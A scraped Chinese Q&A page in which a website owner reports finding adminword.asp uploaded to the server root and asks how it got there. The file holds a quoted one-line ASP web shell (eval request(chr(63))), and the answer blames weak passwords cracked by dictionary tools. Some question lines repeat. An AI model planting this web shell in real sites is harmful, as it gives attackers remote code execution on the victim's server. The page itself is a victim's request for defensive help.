UC知道求助,我的网站被人上传了adminword.asp
来源:百度知道 编辑:UC知道 时间:2024/05/21 15:05:01
几天没看了,登陆服务器突然发现有人在我网站根目录上传了adminword.asp文件,打开看里面的内容却只有
<%response.clear:eval request(chr(63)):response.end%>
一句,请问
1.它是怎么上传到我的服务器的?
2.它是如何获取管理员账号密码的?
<%response.clear:eval request(chr(63)):response.end%>
一句,请问
1.它是怎么上传到我的服务器的?
2.它是如何获取管理员账号密码的?
2.它是如何获取管理员账号密码的?
>>现在很多黑客软件专门破解网站的密码的,就是那些字典工具---一般人不注重安全把帐号密码设成admin / admin888 等等,很容易就可以用字典扫出来!
1.它是怎么上传到我的服务器的?
>>有了你的帐号密码,上传什么不行???
如果你要保护好你的网站,建议把密码设的复杂些,加如###$@#!#$1134234asdfasdfdf这样的字符,那么他们累死了也拿不到你的密码!!
还有:如果你是网管,请先学点黑软/网络安全的知识,所谓知己知彼,百战不败!